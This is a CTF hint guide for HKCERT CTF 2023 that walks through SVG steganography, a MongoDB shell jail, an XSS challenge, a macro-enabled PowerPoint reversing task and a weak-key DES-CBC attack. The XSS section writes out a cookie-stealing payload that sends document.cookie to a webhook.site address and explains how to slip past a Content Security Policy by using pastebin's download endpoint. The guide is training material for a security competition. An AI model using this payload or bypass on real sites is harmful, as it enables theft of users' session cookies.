HKCERT CTF 2023: Guide to handwavy challenges (II)

HKCERT CTF 2023: Guide to handwavy challenges (II)

ST碼 (I) / ST Code (I) (Misc)

Browse /flag1 will result in a QR Code，but it looks uneven
- If you read the source code of the server carefully, you should know that it is a scalable vector graphic (SVG)
View the source code of the image, you can find that there are some rx="0" and rx="1", which are suspicious
- So this is the reason why the image looks uneven
Record these numbers from the top to the bottom, you should get 01101000 01101011 ...
- Can you guess what is the encoding scheme? __________
Using this encoding scheme to decode，you should get hkcert23{...
- Looks like this is the flag!

Answer：Binary ASCII Code

獄門疆 / MongoJail (Pwn)

Partial Spoiler

This challenge seems to be unrelated to "Goku Mon Kyo"
- But it is related to MongoDB Shell (mongosh)
- mongosh is a specialized node.js "Read–eval–print" loop (REPL) environment
You can enter any Javascript code in a restricted mongosh
All built-in variables and functions, and require,module,globalThis are also ~~sealed~~ became undefined
What else can we do? Let's have a look on the Reference
- Built-in objects are all ~~sealed~~ became undefined
- Expressions & operators can still be used… At least you can do addition
  - Spoiler: Which method can be used to open the other side of the seal?

又有寶貝 XSS / Baby XSS again (Web)

First, you should have some understanding about XSS challenges in CTF
- If you have no idea, maybe check out the description from Infant XSS from HKCERT CTF 2021…
- Basically you need to find an XSS vulnerability and send the webpage with the payload to the bot to perform sensitive actions or capture sensitive information, such as Cookie
For this challenge, the description has already told you that you can inject script using the src query string parameter, because of the following:

out += """<script src="%s"></script>""" % request.args.get("src", "http://example.com/")

But there is Content Security Policy that restricts the source of the script to be from the domain https://hcaptcha.com,https://*.hcaptcha.com or https://pastebin.com:

<meta http-equiv="Content-Security-Policy" content="script-src https://hcaptcha.com https://*.hcaptcha.com https://pastebin.com">

I don't think you want to craft your gadget in hcaptcha.com, so let's go for the pastebin
- First, craft a script that could redirect the victim to your webhook that captures sensitive information (The flag is in Cookie for this challenge), and post it on pastebin
- For example, location='https://webhook.site/your_webhook_site_id/?cookie='+document.cookie
- Then you should see your paste like this: https://pastebin.com/KvbMXuyv
- To keep only the script code, you may use the "raw" function: https://pastebin.com/raw/KvbMXuyv
But when you tried to include the script, it doesn't work!
- http://babyxss-k7ltgk.hkcert23.pwnable.hk:28232/?src=https://pastebin.com/raw/KvbMXuyv
- Why? Because modern browser also checks the Content-Type header of the embedded file
- The content type of file managed to be text/plain in this case, which will not be executed as javascript
How about the other way? Instead of "raw", we may also try "download": https://pastebin.com/dl/KvbMXuyv
This time it works, the page indeed redirects: http://babyxss-k7ltgk.hkcert23.pwnable.hk:28232/?src=https://pastebin.com/dl/KvbMXuyv
Then you can send this link to the bot (and fill in the annoying CAPTCHA) and get the flag

轉蛋模擬器 / Gacha Simulator (Reverse)

Partial Guide

This challenge is best viewed with .NET Framework
This is a pptm file, which is Macro Enabled. Make sure you check out the VBA code under the Developer tab.
https://support.microsoft.com/en-au/office/show-the-developer-tab-e1192344-5e56-4d45-931b-e5fd9bea2d45
Can't see source code? Try this
https://stackoverflow.com/questions/1026483/is-there-a-way-to-crack-the-password-on-an-excel-vba-project
Then there are many ways to solve, like changing the probability, rearrange the encrypted data, decrypt the encrypted data directly, etc. Good luck!

下手ですね / BADES (Crypto)

Challenge Description

In this challenge, we are given an slightly modified Data Encryption Standard (denoted by DES'). Additionally, we are given the two oracles:

encrypt_flag encrypts the flag using DES'-CBC.
encrypt encrypts an arbitrary message using DES'-CBC.

The goal is to retrieve the flag using the above oracle calls.

Partial Guide

With __left_rotations being changed, all keys became weak keys. If we are using electronic codebook (ECB) mode of operation, $Encrypt (Encrypt (m)) = m$ , or intuitively, encrypting the same message twice would result in getting the message.

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Learn More →

Figure 1.

However, in this case, we are using the CBC mode. This is how the a message is encrypted when we use encrypt_flag (or encrypt). At the very beginning, the message is padded to a size of multiple of 8. After that, it is chopped into blocks of 8 bytes:

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Learn More →

Figure 2.

It is then encrypted to the ciphertext $c_{0} ‖ c_{1} ‖ c_{2} ‖ . . .$ which is given to us. How can we make use of the "encrypting the ciphertext actually decrypts it" behaviour to recover $m_{1}, m_{2}, . . .$ ?

Let's show how we retrieve $m_{1}$ by encrypting $c_{0} \oplus c_{1}$ :

Image Not Showing Possible Reasons

The image was uploaded to a note which you don't have access to
The note which the image was originally uploaded to has been deleted

Learn More →

Figure 3.

Since $c_{0} \oplus (c_{0} \oplus c_{1}) = c_{1}$ , the content we are passing to the encrypt function being $c_{1}$ . In Figure 2, we know $Encrypt (c_{1}) = c_{0} \oplus m_{1}$ . Now we can recover $m_{1}$ by computing $c_{0} \oplus (c_{0} \oplus m_{1})$ .

Now decrypt the remaining blocks!